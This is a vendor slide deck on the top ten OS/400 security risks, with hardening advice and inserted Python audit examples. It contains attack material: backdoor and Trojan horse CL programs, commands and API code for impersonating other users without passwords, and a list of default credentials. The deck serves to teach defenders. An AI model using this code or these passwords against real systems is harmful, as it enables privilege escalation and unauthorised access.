Top 10 OS/400 Security Risks


Page 1: Top 10 OS400 Security Risks

Copyright (c) 1999 - 2002 The Powertech Group

Definitive iSeries Security: A Presentation

John Earl, Chief Technology Officer
The PowerTech Group
www.powertech.com
john.earl@powertech.com

Top 10 OS/400 Security Risks

October 2004

Page 2

© 2003 PowerTech Group, Inc. All rights reserved. www.powertech.com [email protected]

Copyright & Disclaimer

This information is meant for the edification of the OS/400 user community. It is my sincere desire that you use this information to your advantage and make your systems more secure with it.

As with any software modification, you should test the impact of these recommendations before implementing them on production systems. Because every system is potentially different, neither I nor The PowerTech Group can assume any responsibility for any adverse effects of improperly tested implementations.

And finally, to protect our copyright (and out of common courtesy to the author), we respectfully request that you do not reproduce this material in any advertisement, web site, or other printed format without the express written consent of the copyright holder.

Page 3

PowerTech/IBM Relationship

> Multi-level: Executive through developer
> Partner Programs: System Mgmt Partner Group, Advanced Development Partner
> Business with Global Services: Worldwide agreement with IGS; IGS recommends PowerTech with engagements; Installed in IBM outsourced clients
> Installed in IBM San Jose, Rochester, NY,

Page 4

The Biggest Threat to your Corporate Data

HACKERS!!! or Your Company

Page 5

Enterprise Security Evolution

Page 6

Source Code for a Secret, Terrible and Dastardly Hacking Program

> Source code for program QSYS/QBACKDOOR:

    PGM
    CALL QCMD
    ENDPGM

> When compiled to adopt a powerful user's authority, this program is dangerous without limits.

Page 7

Top 10 OS/400 Security Risks

Agenda

Introduction

The Top 10
1. User Identity Theft
2. Powerful Users
3. System Value Weaknesses
4. Library and Library List Problems
5. The Open Door Policy
6. Promiscuous Object Ownership
7. Command Interface Abuse
8. Trojan Horses
9. No Audit Ability
10. Unprotected Network Access

Conclusion

Page 8

User Identity Theft

> There are 5 well-known ways to steal an OS/400 User ID. From the difficult to the easy, they are:

1. Use an OS/400 Job Description to masquerade as the user
2. Use the Submit Job command (SBMJOB) to masquerade as the user
3. Use IBM APIs to switch to the user (no password required)
4. Sniff network traffic to find clear text passwords
5. Beg, borrow, steal or guess their password

Page 9

User Identity Theft

Use an OS/400 Job Description to masquerade as the user.

A JOBD that has a User ID specifically attached to it represents the ability to run a job as that user, without knowing the user's password. This exposure exists only on systems running at OS/400 QSECURITY level 30 and lower.

At QSECURITY level 30 and lower, the user needs only *USE (Read) authority to the Job Description.

Example:

    SBMJOB CMD(CALL PGM(QSYS/CRTCLPGM PGM(QSYS/QBACKDOOR) +
               SRCFILE(MYLIB/QCLSRC) OPTION(*NOSRC) GENOPT(*NOLIST) +
               USRPRF(*OWNER) LOG(*NO) ALWRTVSRC(*NO) AUT(*ALL))) +
           JOB(REPORT) JOBD(QGPL/QBATCH) USER(*JOBD)

> Solution? Move to QSECURITY level 40 or higher.

Page 10

User Identity Theft

Use the Submit Job command (SBMJOB) to masquerade as the user.

The SBMJOB command allows the submitter to specify the name of another user, and have the submitted job run using the assumed identity. All that is required is *USE (Read) authority to the target User Profile object. Example:

    SBMJOB CMD(CALL PGM(QSYS/CRTCLPGM PGM(QSYS/QBACKDOOR) +
               SRCFILE(MYLIB/QCLSRC) OPTION(*NOSRC) GENOPT(*NOLIST) +
               USRPRF(*OWNER) LOG(*NO) ALWRTVSRC(*NO) AUT(*ALL))) +
           JOB(REPORT) JOBD(QGPL/QBATCH) USER(SALLY)

Page 11

User Identity Theft

Use IBM APIs to switch to the user (no password required).

The following code will allow me to become someone else without knowing their password.

Program QSYS/QASSUME

    PGM PARM(&USER)
    DCL &USER *CHAR 10
    DCL &HANDLE *CHAR 10
    DCL &ERROR *CHAR 4
    CHGVAR %BIN(&ERROR) 0
    CALL 'QSYGETPH' PARM(&USER *NOPWD &HANDLE &ERROR)
    CHGVAR %BIN(&ERROR) 0
    CALL 'QWTSETP' PARM(&HANDLE &ERROR)
    ENDPGM

Censored !!!

Page 12

User Identity Theft

Sniff network traffic to find clear text passwords.

Several protocols submit User IDs and passwords in clear text. Among them are FTP, Telnet, and older forms of Client Access and PC Support.

> Minimize use of the legacy OS/400 sign-on screen (QDSIGNON)
> Set the Client Access "Bypass Signon" flag to yes, and the OS/400 system value QRMTSIGN to *VERIFY
> Use VPNs when communicating over unsecured networks

Page 13

User Identity Theft

Beg, borrow, steal, or guess their password.

Password protection is the best defense!

> AS/400 requires a password in order to gain access.
> A solid password policy will prevent most breaches from the outside – and from nefarious insiders too.
> Don't send passwords via email, or over unsecured networks.
> Require that passwords be changed at regular intervals.
> Don't use default passwords. EVER.

Page 14

User Identity Theft

All of the default passwords are well known!

Subject: alt.2600 FAQ (1/3) #18
From: [email protected]
alt.2600 Message segment 18 of 63

    AS/400
    ~~~~~~
    qsecofr  qsecofr  /* master security officer */
    qsysopr  qsysopr  /* system operator */
    qpgmr    qpgmr    /* default programmer */
    ibm      password
    ibm      2222
    ibm      service
    qsecofr  1111111
    qsecofr  2222222
    qserv    qserv
    qsvr     qsvr
    secofr   secofr
    qsrv     ibmce

Page 15

User Identity Theft

Prevent trivial passwords. At a minimum, set these system values:

    System Value Name   Value   Description
    QPWDEXPITV          90      90 days
    QPWDMINLEN          6       6 character minimum length
    QPWDRQDDGT          1       Require a digit
    QPWDRQDDIF          5       Unique in 10

Don't go too wild with password rules (the QPWD* system values), or your users won't remember their passwords!

Page 16

Powerful Users

> Users can be made more powerful through the granting of OS/400 "Special Authorities". Special Authorities can trump OS/400 object level authorities.

>> A user with *ALLOBJ can read, change, or delete ANY object on the system.
>> A user with *SPLCTL can read, change, or delete ANY spool file on the system.
>> A user with *JOBCTL can view, change, or stop ANY job on the system (includes ENDSBS and PWRDWNSYS).
>> A user with *SAVSYS can read or delete ANY object on the system.

Page 17

Powerful Users

> What do special authorities do?

>> *ALLOBJ - ALL authority to every object on the system – Game Over!
>> *AUDIT - Authority to manipulate system auditing values.
>> *IOSYSCFG - Authority to create and modify communications to the system.
>> *JOBCTL - Authority to control other users' jobs.

Page 18

Powerful Users

> What do special authorities do?

>> *SAVRST - Authority to save, restore, and remove any object on the system.
>> *SECADM - Authority to change profiles and passwords.
>> *SERVICE - Authority to use the system service tools.
>> *SPLCTL - *ALLOBJ authority for spool files.

Page 19

System Value Weaknesses

There are several system values that must be set properly to protect your system.

> Set the system values to their most protective setting – and then toggle them off/on as needed.
> Monitor system values to detect and alert you whenever they are changed.
>> Ensure that those system values are changed back
>> Monitor for toggle-off / toggle-on conditions
>> Monitor what is done while system values are toggled off

Page 20

System Value Weaknesses

Signon Control – Regulate signon to prevent attacks:

    QDSPSGNINF = 1         Display the signon information screen.
    QINACTITV = 30         Time out a screen after 30 idle minutes.
    QINACTMSGQ = *DSCJOB   When a job is timed out, disconnect the job and show the signon screen.
    QMAXSIGN = 3           Maximum invalid signon attempts allowed.
    QMAXSGNACN = 2         Disable user after 'N' invalid signon attempts.
    QRMTSIGN = *VERIFY     Allow user to bypass the legacy signon screen.

Page 21

System Value Weaknesses

Malicious Programs – Prevent malicious programs from being loaded onto your system by setting these system values:

    QALWOBJRST = *NONE   Do not allow sensitive program restore.
    QFRCCVNRST = 1       Force object conversion on restore.
    QVFYOBJRST = 3       Signed objects must be valid upon restore.

Page 22

System Value Weaknesses

Operating System Integrity Setting – Use these settings to ensure system integrity at all times:

    QSECURITY = 40 or 50   Do not allow programs to bypass OS security.

QSECURITY supports 5 levels:

    10 = Physical Security
    20 = Password Security
    30 = Resource Security
    40 = Operating System Security
    50 = Enhanced Operating System Security
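The recommended settings from pages 15 and 20 to 22 can be checked mechanically. The Python below is an added example, not code from the presentation or from PowerTech; it assumes the system values have been captured into a simple "NAME VALUE" text listing (the constructed sample inside it, not the real DSPSYSVAL/WRKSYSVAL spooled layout) and reports every value that falls short of the deck's baseline, treating *NOMAX and *NONE as failing any upper bound.

```python
"""Check captured OS/400 system values against the deck's baseline.

Added example, not part of the presentation.  The listing format is a
constructed, simplified "NAME VALUE" text, one system value per line.
"""
import re
from typing import Callable, Dict, List, Tuple


def _num(value: str):
    """Integer for numeric settings; None for *NONE, *NOMAX and the like."""
    return int(value) if value.isdigit() else None

def _at_most(limit: int) -> Callable[[str], bool]:
    # *NOMAX / *NONE never satisfy an upper bound: they mean "no limit".
    return lambda v: _num(v) is not None and _num(v) <= limit

def _at_least(limit: int) -> Callable[[str], bool]:
    return lambda v: _num(v) is not None and _num(v) >= limit

def _one_of(*allowed: str) -> Callable[[str], bool]:
    return lambda v: v in allowed


# Baseline from the slides: page 15 (passwords), 20 (signon), 21 (restore
# controls) and 22 (QSECURITY).  Entry: (check, human-readable target).
BASELINE: Dict[str, Tuple[Callable[[str], bool], str]] = {
    "QSECURITY":  (_at_least(40), "40 or 50"),
    "QPWDEXPITV": (_at_most(90), "90 days or fewer"),
    "QPWDMINLEN": (_at_least(6), "at least 6 characters"),
    "QPWDRQDDGT": (_one_of("1"), "1 (require a digit)"),
    # 5 = unique in the last 10 passwords; 1-4 keep even more history.
    "QPWDRQDDIF": (lambda v: _num(v) is not None and 1 <= _num(v) <= 5,
                   "1-5 (unique in at least 10)"),
    "QDSPSGNINF": (_one_of("1"), "1 (show signon information)"),
    "QINACTITV":  (_at_most(30), "30 minutes or fewer"),
    "QINACTMSGQ": (_one_of("*DSCJOB"), "*DSCJOB"),
    "QMAXSIGN":   (_at_most(3), "3 attempts or fewer"),
    # 2 disables the profile; 3 disables it and varies off the device too.
    "QMAXSGNACN": (_one_of("2", "3"), "2 or 3"),
    "QRMTSIGN":   (_one_of("*VERIFY"), "*VERIFY"),
    "QALWOBJRST": (_one_of("*NONE"), "*NONE"),
    "QFRCCVNRST": (_at_least(1), "1 or higher"),
    "QVFYOBJRST": (_at_least(3), "3 or higher"),
}

LINE = re.compile(r"^\s*(Q[A-Z0-9]+)\s+(\S+)")

# Constructed capture of a system never hardened beyond shipped defaults.
SAMPLE_LISTING = """\
QSECURITY    30
QPWDEXPITV   *NOMAX
QPWDMINLEN   6
QPWDRQDDGT   0
QPWDRQDDIF   0
QDSPSGNINF   1
QINACTITV    *NONE
QINACTMSGQ   *DSCJOB
QMAXSIGN     3
QMAXSGNACN   2
QRMTSIGN     *VERIFY
QALWOBJRST   *ALL
QFRCCVNRST   1
QVFYOBJRST   3
"""


def parse_listing(text: str) -> Dict[str, str]:
    """Turn the captured listing into {system value name: current setting}."""
    values: Dict[str, str] = {}
    for line in text.splitlines():
        match = LINE.match(line)
        if match:
            values[match.group(1)] = match.group(2)
    return values


def check_system_values(text: str) -> List[Tuple[str, str, str]]:
    """(name, actual, target) for every baseline value not met.  A value absent
    from the capture is reported too: unchecked is not the same as passed."""
    current = parse_listing(text)
    findings = []
    for name, (is_ok, target) in BASELINE.items():
        actual = current.get(name, "<missing>")
        if actual == "<missing>" or not is_ok(actual):
            findings.append((name, actual, target))
    return findings
```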

Page 23

Libraries and Library Lists

Libraries are collections of data that a user can access.

> If a user has *EXCLUDE authority to a library, they cannot access anything in that library.
> If a user has *USE authority to a library, they can read, change or delete objects in that library, assuming they have authority to the object itself.
> A user with *USE plus *ADD authority can place new objects into a library.
> A user with *ALL authority can delete the library.

Libraries are your first line of defense.
> Grant users no more than *USE authority to production libraries.
> Specify *EXCLUDE for sensitive libraries.

Page 24

Libraries and Library Lists

A library list specifies the order in which objects and files are searched for. The ability to place objects in a library that is higher on the library list (assuming *USE plus *ADD capability) represents the ability to skirt many security designs.

Example:
> If the library list contains LIBA, LIBB, and LIBC,
> and security checking program PROGZ exists in LIBC,
> and user Fred has *USE + *ADD authority to LIBA,
> user Fred could place a bogus version of PROGZ into LIBA that bypasses security.

Solution: Users only need *USE authority to libraries in their library list. This is especially true of libraries on the system portion of the library list (system value QSYSLIBL).
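Both halves of the page 24 problem can be audited: objects that already shadow a same-named object later in the list, and users whose library authority would let them plant one. The Python below is an added example, not from the presentation or PowerTech; the library list, object inventory and authorities are constructed (on a real system they would be taken from DSPLIBL, DSPOBJD and DSPOBJAUT output), and it treats *CHANGE and *ALL as implying *ADD because both include that data right.

```python
"""Library-list shadowing audit for the PROGZ scenario on page 24.

Added example, not part of the presentation.  All data below is constructed.
"""
from typing import Dict, List, Set, Tuple

# Search order as a user's job would see it.
LIBL = ["LIBA", "LIBB", "LIBC"]

# library -> program names it contains (PROGZ in LIBC is the real security check)
INVENTORY: Dict[str, Set[str]] = {
    "LIBA": {"PROGZ", "RPT001"},
    "LIBB": {"INV100"},
    "LIBC": {"PROGZ", "SECCHK"},
}

# user -> {library: authorities held on the library object itself}
LIB_AUTH: Dict[str, Dict[str, Set[str]]] = {
    "FRED":  {"LIBA": {"*USE", "*ADD"}, "LIBB": {"*USE"}, "LIBC": {"*USE"}},
    "SALLY": {"LIBA": {"*USE"}, "LIBB": {"*USE"}, "LIBC": {"*USE"}},
}

# *CHANGE and *ALL both include the *ADD data right, so any of these lets
# the user create objects in the library.
CAN_ADD = {"*ADD", "*CHANGE", "*ALL"}


def shadowed_objects(libl: List[str], inventory: Dict[str, Set[str]]) -> List[Tuple[str, str, str]]:
    """(name, library that wins, library that is shadowed) for every duplicate
    name: an unqualified CALL resolves to the first library in the list."""
    first_seen: Dict[str, str] = {}
    findings: List[Tuple[str, str, str]] = []
    for lib in libl:
        for name in sorted(inventory.get(lib, set())):
            if name in first_seen:
                findings.append((name, first_seen[name], lib))
            else:
                first_seen[name] = lib
    return findings


def users_who_can_plant(libl: List[str], lib_auth: Dict[str, Dict[str, Set[str]]],
                        target_lib: str) -> List[Tuple[str, str]]:
    """(user, library) pairs where the user can create objects in a library
    searched BEFORE target_lib, i.e. could shadow anything target_lib holds."""
    ahead = libl[: libl.index(target_lib)]
    result: List[Tuple[str, str]] = []
    for user, auths in sorted(lib_auth.items()):
        for lib in ahead:
            if auths.get(lib, set()) & CAN_ADD:
                result.append((user, lib))
    return result


def report(libl: List[str], inventory: Dict[str, Set[str]],
           lib_auth: Dict[str, Dict[str, Set[str]]]) -> List[str]:
    """Existing shadows first, then who could create new ones, per library."""
    lines: List[str] = []
    for name, winner, loser in shadowed_objects(libl, inventory):
        lines.append(f"{name} in {winner} shadows {loser}/{name}")
    for lib in libl:
        for user, where in users_who_can_plant(libl, lib_auth, lib):
            lines.append(f"{user} can add objects to {where}, ahead of {lib}")
    return lines


if __name__ == "__main__":
    for line in report(LIBL, INVENTORY, LIB_AUTH):
        print(line)
```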

Page 25

The Open Door Policy

> Every OS/400 object specifies some kind of authority for a user called *PUBLIC.

WHO IS *PUBLIC? Any user of this computer who does not have explicit authority to a given object.

> In the old days *PUBLIC was "Everyone in my company".
> Then as we networked to more and more systems, *PUBLIC became everyone you do business with (customers, vendors, partners, etc.).
> With virtually every network connected to every other network (it's called "The Internet!"), *PUBLIC could be anyone in the WORLD that can connect to your network!!!

In a perfect world, *PUBLIC should have little or no authority to production applications.

Page 26

The Open Door Policy

> At a maximum, business application users need no more than:

>> *USE authority to static objects such as: programs, display files, print files, work management objects, etc. All static objects (those that do not contain data in one form or another) will work for users that have only *USE.
>> *CHANGE authority to dynamic objects such as: data files, data areas, data queues, message queues, etc. Those things that regularly change as a matter of normal business.

> But ideally, don't give *PUBLIC even read (*USE) authority to anything that you wouldn't want published on the Internet tonight.

> Look at the QCRTAUT system value to see what authority *PUBLIC is given by default to newly created objects.

Page 27

Promiscuous Object Ownership

> Promiscuous Object Ownership is where end users belong to a group profile that owns all of the application objects.

>> This plan makes it easy to administer security because everyone has all rights based solely on their membership in the ownership group.
>> This plan often assumes that all application access will take place through a predefined menu interface – thereby restricting what a user can actually see and change.

Page 28

Promiscuous Object Ownership

> Why is this a problem? Users are no longer locked into green screen interfaces and dumb terminals. There are numerous ways of getting at the data:

>> Command line access
>> DFU, DBU, EZView and other data manipulation tools
>> QUERY/400, SQL, and other query tools
>> Others???

Make sure that you've got all the back doors (and Windows!) covered as well.

Page 29

Command Line Interface Abuse

> The ability to execute commands allows a user to skirt traditional menu limitations.

Commands can be entered in a variety of ways:
1. OS/400 command line (CALL QCMD)
2. OS/400 screens that display a command line (WRKOUTQ, WRKWTR etc.), or other applications with hidden command line access keys
3. Through the use of the Attention key
4. Using FTP to issue a command remotely
5. Using DDM to issue a command remotely
6. Using Client Access to issue a command remotely

Page 30

Command Line Interface Abuse

> Control users' access to commands by:

>> Using the Limited Capability parameter (LMTCPB) on the OS/400 user profile to limit items 1-4 on the previous page (assuming OS/400 V4R2 or higher).
>> Beware that items 5 and 6 on the previous page do not adhere to the LMTCPB parameter limitations.
>> Using an exit program to limit DDM and Client Access commands.

Some users will still require command line access: programmers, operators, vendors, and selected power users.

Page 31

Command Line Interface Abuse

Page 32

A Trojan Horse

> Program QSYS/QTROJAN

    QSYS/DCL &ALLOBJ *CHAR 10
    QSYS/DCL &COUNT *DEC (3 0)
    QSYS/DCL &SPCAUT *CHAR 100
    QSYS/DCL &START *DEC (3 0) VALUE(1)
    QSYS/MONMSG CPF0000
    QSYS/RTVUSRPRF SPCAUT(&SPCAUT)
    LOOP: IF (&COUNT *LE 10)
    QSYS/CHGVAR VAR(&ALLOBJ) VALUE(%SST(&SPCAUT &START 10))
    QSYS/IF COND(&ALLOBJ = 'ALLOBJ') THEN(DO)
    QSYS/CRTCLPGM PGM(QSYS/QBACKDOOR) SRCFILE(MYLIB/QCLSRC) +
        OPTION(*NOSRC) GENOPT(*NOLIST) +
        USRPRF(*OWNER) LOG(*NO) ALWRTVSRC(*NO) +
        AUT(*ALL)
    QSYS/RETURN
    QSYS/ENDDO
    QSYS/CHGVAR VAR(&COUNT) VALUE(&COUNT + 1)
    QSYS/CHGVAR VAR(&START) VALUE(&START + 10)
    QSYS/GOTO LOOP

Censored !!!

Page 33

Trojan Horses

> A malicious person who hides a Trojan Horse on your system will (generally) have the following goals:

>> Have the program assume high levels of authority
>> Be able to run the program at will
>> Hide the program from the system administrators
>> Have the program execute often, and by a variety of users.

> An IBM exit point program that can be deleted (and/or replaced) by someone other than the System Administrator represents an opportunity for a Trojan Horse.

>> *USE authority is sufficient to run these exit programs. Anything more, and you are at risk of introducing a Trojan Horse.

Page 34

Trojan Horses

> System Values (WRKSYSVAL)
>> QATNPGM - Attention program
>> QPWDVLDPGM - Password validation program
>> QRMTSIGN - Remote sign-on control
>> QSTRUPPGM - Startup program

> Network Values (CHGNETA)
>> PCSACC - PC Support exit point
>> DDMACC - DDM exit point

> Registration Info (WRKREGINF)
>> ADDEXITPRG - Add Exit Program

Hundreds of program opportunities here.

Page 35

Trojan Horses

> Message Files (CHGMSGD)
>> The DFTPGM parameter allows a default handling program. 10's of thousands of message queues.

> Subsystems (CHGSBSD)
>> Routing and communication entries contain program names.

> Database Triggers (ADDPFTRG)
>> Use PRTTRGPGM to monitor trigger usage.

> Command Exit Programs
>> Monitor command exits (V4R5) and validation programs. Over 2000 OS/400 commands.

Page 36

No Audit Ability

> If you had a security problem, would you know?
>> Who did it?
>> What happened?
>> When it happened?
>> How it was done?
>> How to stop it from happening again?

> What if the data was not damaged, but only stolen?

Page 37

No Audit Ability

> In order to prevent security breaches, you must first be able to detect them.

> Use the OS/400 security auditing journal (QAUDJRN) to help determine where your security stands. Why?
>> It's free (from IBM)
>> It's a comprehensive gathering tool
>> It's an irrefutable source of historical events.

Page 38

No Audit Ability

> Turn on OS/400 security auditing by typing:

    CHGSECAUD QAUDCTL(*AUDLVL) +
              QAUDLVL(*AUTFAIL *CREATE *DELETE +
                      *JOBDTA *NETCMN *OBJMGT +
                      *OFCSRV *OPTICAL *PGMADP +
                      *PGMFAIL *PRTDTA *SAVRST +
                      *SECURITY *SERVICE *SPLFDTA +
                      *SYSMGT) +
              INLJRNRCV(SECURLIB/AUDRCV0001)

> This will generate a lot of audit trails.
> Use tools to sift through the audit trails to find important events.
> If at all possible, save all security journal receivers.
> Make sure QAUDENDACN is *NOTIFY.
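Page 19 asked for monitoring of toggle-off / toggle-on conditions and of what is done while a protective system value is off; the *SECURITY and *SAVRST audit levels turned on above supply the raw material for that in QAUDJRN's SV (system value changed) and OR (object restored) entries. The Python below is an added example, not from the presentation or PowerTech: it reads a constructed, simplified CSV extract (timestamp, entry type, user, job, two detail fields; a real extract would come from DSPJRN over QAUDJRN and carry many more columns) and reports each window in which a page 21 restore-control value left its baseline, what was restored in the meantime, and whether the value was ever set back.

```python
"""Toggle-off / toggle-on detection on restore-control system values.

Added example, not part of the presentation.  The extract is a constructed,
simplified CSV: timestamp, entry type, user, job, detail 1, detail 2.
Entry types used: SV = system value changed (detail 1 = name, detail 2 = new
value); OR = object restored (detail 1 = object, detail 2 = object type).
"""
import csv
from io import StringIO
from typing import Dict, List

# Protective settings from page 21; any other setting opens a window.
BASELINE = {"QALWOBJRST": "*NONE", "QVFYOBJRST": "3", "QFRCCVNRST": "1"}

# Constructed extract: one nightly restore done "properly" (value put back),
# one daytime change that is never reverted.
SAMPLE_EXTRACT = """\
2004-10-05 02:10:01,SV,OPER1,123456/OPER1/NIGHTLY,QALWOBJRST,*ALL
2004-10-05 02:11:30,OR,OPER1,123456/OPER1/NIGHTLY,PRODLIB/ORDERS,*FILE
2004-10-05 02:12:04,OR,OPER1,123456/OPER1/NIGHTLY,QGPL/PATCH01,*PGM
2004-10-05 02:15:00,SV,OPER1,123456/OPER1/NIGHTLY,QALWOBJRST,*NONE
2004-10-05 09:00:00,SV,SECOFR,123500/SECOFR/QPADEV0001,QVFYOBJRST,1
2004-10-05 09:30:00,OR,SECOFR,123500/SECOFR/QPADEV0001,QGPL/UTIL01,*PGM
"""


def parse_extract(text: str) -> List[List[str]]:
    return [row for row in csv.reader(StringIO(text)) if row]


def detect_toggles(text: str) -> List[Dict]:
    """One finding per window in which a baseline value was switched off.

    'closed' stays None when the journal ends with the value still off, the
    condition page 19 says to watch for most closely."""
    open_windows: Dict[str, Dict] = {}
    findings: List[Dict] = []
    for row in parse_extract(text):
        ts, etype, user, job, detail1, detail2 = row
        if etype == "SV" and detail1 in BASELINE:
            if detail2 != BASELINE[detail1] and detail1 not in open_windows:
                open_windows[detail1] = {"sysval": detail1, "set_to": detail2,
                                         "user": user, "job": job, "opened": ts,
                                         "closed": None, "events": []}
                continue
            if detail2 == BASELINE[detail1] and detail1 in open_windows:
                window = open_windows.pop(detail1)
                window["closed"] = ts
                findings.append(window)
                continue
        # Anything else that happens while a window is open is attributed to
        # it, so the reviewer sees what was restored with the protection off.
        for window in open_windows.values():
            window["events"].append(row)
    findings.extend(open_windows.values())   # never switched back on
    return findings


def summarize(findings: List[Dict]) -> List[str]:
    """One line per window, flagging windows that were never closed."""
    lines: List[str] = []
    for w in findings:
        state = f"restored at {w['closed']}" if w["closed"] else "STILL OFF"
        restored = ", ".join(e[4] for e in w["events"] if e[1] == "OR") or "nothing"
        lines.append(f"{w['sysval']} set to {w['set_to']} by {w['user']} at "
                     f"{w['opened']} ({state}); restored meanwhile: {restored}")
    return lines


if __name__ == "__main__":
    for line in summarize(detect_toggles(SAMPLE_EXTRACT)):
        print(line)
```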

Page 39

Unprotected Network Access

> Some facts about iSeries security:
>> The DB2/400 database is integrated with the operating system. Users have all of the authority that their group IDs carry, and in many purchased software applications, group IDs own the application data.
>> OS/400 ships with all of its TCP/IP services turned on. These network services provide authorized users access to application data.
>> If you do not have exit programs in place, you likely are at risk of sharing OS/400 data with every user on your network.
>> PowerLock NetworkSecurity is an iSeries host-based access control and monitoring software package that protects application data from too-powerful users.

Page 40

Unprotected Network Access

> Most AS/400s rely on menu security
>> It was easy to build
>> It's the 'legacy' of many S/36 and S/38 applications

> Most menu 'security' designs assume:
>> All access is through the application menu.
>> No users have command line access.
>> Query access is limited or denied completely.
>> That the user is a member of the group that owns the objects, or *PUBLIC has broad access to the data.

Page 41

Unprotected Network Access

> Menu security is no longer relevant in a networked environment.
>> Users are all using PCs, not dumb terminals.
>> PCs have sophisticated data access tools like FTP, ODBC, Remote Command and more.
>> End users are much more sophisticated – many hit the workforce with a pre-existing familiarity with these tools.

> Don't believe that the 5250 green screen is the "End" of your security responsibility.

Page 42

(Diagram: Application Menu / CRM)

Result: Too Much Access

Page 43

Unprotected Network Access

Page 44

Unprotected Network Access

Some of the network access methods…

> CLIENT ACCESS/400
>> Get file transfer
>> Put file transfer
>> Remote Command
>> ODBC
>> Data Queue access

> NetServer
>> Windows Network Neighborhood
>> Shared Folders
>> Shared Printers

> FTP
>> Get file
>> Put file
>> Delete file
>> Delete library
>> Remote Command

> DDM
>> Copy file
>> Remote Command
>> DRDA
>> Shared Folders
>> Etc.

There are over 250 access points to an iSeries database!

Page 45

Unprotected Network Access

How do you regulate network access to data?

> Implement exit programs on network access points like FTP, ODBC, DDM, etc. Exit programs:
>> Will protect systems that rely solely on menu security.
>> Can be used to limit what trading partners can see when they access your system.
>> Monitor access that normally flies beneath your radar.
>> Stop unwanted activity even when you're not around.
>> Provide "defense in depth" security beyond traditional controls.

Page 46

Unprotected Network Access

What is an exit point anyway?

A point in a process where control can be passed to a user-supplied program. The user-supplied program can usually perform processing that overrides or complements the processing done by the main process.

Example (main program: IBM's FTP Server; user-specified exit program):
1. User requests data.
2. FTP Server calls the exit program.
3. Exit program analyzes the request and returns the result (pass/fail); the FTP Server continues processing...
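The pass/fail decision described above, modeled in Python as an added example (not the presentation's or PowerTech's code). It assumes the shape of IBM's FTP server request validation exit point (QIBM_QTMF_SERVER_REQ, format VLRQ0100: the server passes the user profile, an operation identifier and the operation-specific data, and reads back an "allow operation" flag where 1 accepts and 0 rejects); the operation numbering, users, libraries and rules are constructed for the example, and the policy is default-deny so that the exit program limits what a trading partner can reach, as page 45 describes.

```python
"""Model of an FTP server request-validation exit program's pass/fail decision.

Added example, not part of the presentation.  Operation identifiers are as
assumed for format VLRQ0100; users, libraries and rules are constructed.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

OPERATIONS = {0: "session init", 1: "create dir/lib", 2: "delete dir/lib",
              3: "set current dir", 4: "list files", 5: "delete file",
              6: "send file (get)", 7: "receive file (put)", 8: "rename",
              9: "execute CL command"}

# Constructed entitlements: user -> (operations allowed, libraries allowed).
# Anyone not listed is rejected: the exit program is a default-deny control,
# which is what lets it protect a system that otherwise relies on menus.
POLICY: Dict[str, Tuple[Set[int], Set[str]]] = {
    "EDIPART": ({0, 3, 4, 6, 7}, {"EDIIN", "EDIOUT"}),   # trading partner
    "OPER1":   ({0, 3, 4, 6}, {"PRODLIB"}),              # operator: downloads only
}
# Nobody deletes or runs CL commands through FTP: command-line rights are
# governed by LMTCPB and object authority, and FTP should not widen them.
DENIED_FOR_ALL = {2, 5, 9}


@dataclass
class ExitLog:
    """Every decision is recorded, allowed or not: visibility is half the point."""
    entries: List[Tuple[str, int, str, int, str]] = field(default_factory=list)


def library_of(obj: str) -> str:
    # Objects are given here as LIBRARY/OBJECT; the real exit receives the
    # path in whichever naming format the FTP client selected.
    return obj.split("/", 1)[0].upper() if obj else ""


def ftp_exit(user: str, op: int, obj: str, log: ExitLog) -> int:
    """Return 1 to let the FTP server proceed, 0 to make it reject the request."""
    user = user.upper()
    allow, reason = 0, ""
    if op in DENIED_FOR_ALL:
        reason = f"{OPERATIONS.get(op, op)} is denied for all FTP users"
    elif user not in POLICY:
        reason = "no FTP entitlement (default deny)"
    else:
        ops, libs = POLICY[user]
        if op not in ops:
            reason = f"{OPERATIONS.get(op, op)} not entitled"
        elif op != 0 and library_of(obj) not in libs:
            reason = f"library {library_of(obj)} not entitled"
        else:
            allow, reason = 1, "entitled"
    log.entries.append((user, op, obj, allow, reason))
    return allow


if __name__ == "__main__":
    log = ExitLog()
    ftp_exit("EDIPART", 7, "EDIIN/INV001", log)      # partner puts into its inbox
    ftp_exit("EDIPART", 6, "PRODLIB/PAYROLL", log)   # partner reaches for payroll
    ftp_exit("OPER1", 9, "DSPLIB PRODLIB", log)      # remote command over FTP
    for entry in log.entries:
        print(entry)
```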

Page 47

iSeries Network Access with Network Security in Place

(Diagram: FTP Server, TELNET Server, Database Server, DDM Server, DRDA Server, File xfer Server, SQL Server, each routed through an EXIT PROGRAM)

Network Security software that controls and monitors access to the iSeries through the network interfaces.

Page 48

Prevent Data Theft and Loss

(Diagram: Employees, Suppliers, Distributors)

Provides:
> Visibility to network activity
> Control of network activity
> Security monitoring

Page 49

Conclusions

> Security on OS/400 doesn't just happen, you have to make it happen.
> OS/400 has the best security tools available, so let's use them.
> You can't play in e-business unless you guard against network access.
> If you are compromised, will you know?
> Secure network access points before someone else discovers the exposure.

Page 50

Contact Info:

John Earl
Chief Technology Officer
The PowerTech Group
[email protected] x302

Thank You